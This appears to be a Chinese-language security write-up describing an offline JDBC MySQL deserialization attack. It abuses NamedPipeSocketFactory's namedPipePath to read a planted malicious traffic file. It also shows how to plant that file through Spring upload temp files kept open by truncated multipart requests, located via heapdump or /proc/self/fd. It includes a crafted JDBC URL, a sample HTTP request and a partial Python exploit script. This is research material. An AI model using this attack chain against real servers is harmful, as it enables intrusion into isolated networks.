JDBC MySQL不出网攻击与Spring临时文件利用技术分析<\/h1>

0x00 传统攻击流程分析<\/h2>

传统JDBC MySQL攻击流程包含以下步骤：<\/p>

攻击者控制目标JDBC连接指向恶意fakeServer<\/li>
目标向fakeServer发起连接请求<\/li>
fakeServer下发恶意数据包<\/li>

目标解析恶意数据包完成攻击(文件读取、反序列化等)<\/li> <\/ol>

局限性<\/strong>：<\/p>

需要外连恶意服务器<\/li>
容易被流量设备监测<\/li>
网络隔离环境下无法实施<\/li> <\/ul>
0x01 MySQL驱动的socketFactory机制<\/h2>
socketFactory关键参数<\/h3>

默认值：StandardSocketFactory.class.getName()<\/code><\/li>
功能：指定用于创建MySQL连接的Socket工厂类<\/li> <\/ul> 核心类分析<\/h3> StandardSocketFactory<\/strong>：<\/p> 默认实现<\/li> 使用TCP连接方式<\/li> 需要网络连接MySQL Server<\/li> <\/ul> <\/li> NamedPipeSocketFactory<\/strong>：<\/p> 使用命名管道方式<\/li> 关键代码路径： \/\/ 使用RandomAccessFile打开指定路径文件 <\/span><\/span><\/span><\/span>RandomAccessFile namedPipeFile =<\/span> new<\/span> RandomAccessFile(<\/span>filePath,<\/span> "rw"<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> 连接参数：namedPipePath<\/code>（通过JDBC URL控制）<\/li> <\/ul> <\/li> <\/ol> 控制文件路径<\/h3> JDBC URL中通过namedPipePath<\/code>参数指定文件路径<\/li> 示例格式：jdbc:mysql:\/\/localhost:3306\/test?socketFactory=com.mysql.jdbc.NamedPipeSocketFactory&namedPipePath=\/path\/to\/file<\/code><\/li> <\/ul> 0x02 不出网利用实现<\/h2> 攻击流程<\/h3> 构造恶意流量数据包<\/p> 使用FakeServer生成攻击流量<\/li> 通过Wireshark抓取完整TCP流<\/li> 导出原始数据包<\/li> <\/ul> <\/li> 本地文件利用<\/p> 将导出的数据包保存为文件(如1.pcap)<\/li> 通过namedPipePath<\/code>指定该文件路径<\/li> 触发JDBC连接实现反序列化攻击<\/li> <\/ul> <\/li> <\/ol> 必要条件<\/h3> 能将恶意数据文件推送到目标服务器<\/li> 能控制JDBC连接参数<\/li> <\/ol> 0x03 文件上传技术研究<\/h2> 方法一：业务功能上传<\/h3> 利用现有文件上传功能<\/li> 直接上传恶意文件到已知路径<\/li> 通过namedPipePath<\/code>指定上传文件路径<\/li> <\/ul> 方法二：临时文件+heapdump泄漏<\/h3> Spring Web文件上传机制<\/h4> 使用commons-fileupload处理上传<\/li> 缓冲区大小：DiskFileItemFactory.DEFAULT_THRESHOLD<\/code>(10240字节)<\/li> 超过阈值时缓存到临时文件<\/li> 临时文件路径格式： \/tmp\/{tomcat_path}\/work\/Tomcat\/localhost\/ROOT\/upload_{UID}_{UniqueId}.tmp <\/code><\/pre> UID：随机UUID（类初始化时生成）<\/li> UniqueId：自增ID（每次文件缓存+1）<\/li> <\/ul> <\/li> <\/ul> 防止文件删除技巧<\/h4> 修改HTTP请求使服务器持续等待：去除multipart结束标志--<\/code><\/li> 示例： POST<\/span> \/upload HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=xxxxxxxx<\/span> <\/span><\/span>Content-Length:<\/span> 100000<\/span> <\/span><\/span> <\/span><\/span>--xxxxxxxx <\/span><\/span>Content-Disposition: form-data; name="file"; filename="test.txt" <\/span><\/span>Content-Type: text\/plain <\/span><\/span> <\/span><\/span>[超过10KB的数据... <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ul> heapdump利用<\/h4> 触发临时文件生成<\/li> 通过heapdump获取： UID值<\/li> 临时文件绝对路径<\/li> <\/ul> <\/li> 预测下一个临时文件名（UniqueId+1）<\/li> <\/ol> 方法三：去除heapdump依赖<\/h3> \/proc文件描述符利用<\/h4> Linux特性：未关闭的文件会在\/proc\/self\/fd\/<\/code>下显示<\/li> 关键技巧：不发送multipart结束标志<\/li> 保持文件处于打开状态<\/li> 通过\/proc\/self\/fd\/x<\/code>访问临时文件<\/li> <\/ul> <\/li> <\/ul> 最终利用脚本<\/h4> import<\/span> requests <\/span><\/span> <\/span><\/span>url =<\/span> "http:\/\/target.com\/upload"<\/span> <\/span><\/span>headers =<\/span> { <\/span><\/span> "Content-Type"<\/span>: "multipart\/form-data; boundary=xxxxxxxx"<\/span>, <\/span><\/span> "Content-Length"<\/span>: "1000000"<\/span> # 设置超大值<\/span> <\/span><\/span>} <\/span><\/span> <\/span><\/span># 构造不完整的multipart请求<\/span> <\/span><\/span>data =<\/span> ( <\/span><\/span> "--xxxxxxxx<\/span>\r\n<\/span>"<\/span> <\/span><\/span> "Content-Disposition: form-data; name=<\/span>\"<\/span>file<\/span>\"<\/span>; filename=<\/span>\"<\/span>test.txt<\/span>\"\r\n<\/span>"<\/span> <\/span><\/span> "Content-Type: text\/plain<\/span>\r\n\r\n<\/span>"<\/span> <\/span><\/span> "[超过10KB的恶意数据..."<\/span> <\/span><\/span> # 不包含结束标志<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span># JDBC连接使用\/proc文件描述符<\/span> <\/span><\/span>jdbc_url =<\/span> ( <\/span><\/span> "jdbc:mysql:\/\/localhost:3306\/test?"<\/span> <\/span><\/span> "socketFactory=com.mysql.jdbc.NamedPipeSocketFactory&"<\/span> <\/span><\/span> "namedPipePath=\/proc\/self\/fd\/x"<\/span> # x为文件描述符编号<\/span> <\/span><\/span>) <\/span><\/span><\/code><\/pre>0x04 技术总结<\/h2> 攻击优势<\/h3> 完全不出网，绕过网络隔离<\/li> 隐蔽性强，不易被流量设备检测<\/li> 适用于多种需要本地文件的攻击场景<\/li> <\/ol> 扩展应用<\/h3> ClassPathXmlApplicationContext<\/code>加载本地XML<\/li> 加载本地类文件<\/li> 加载本地插件等场景<\/li> <\/ol> 参考资源<\/h3> JDBC Tricks项目<\/a><\/li> 包含URL绕过技巧和不出网利用demo<\/li> 相关议题PPT和技术细节<\/li> <\/ul>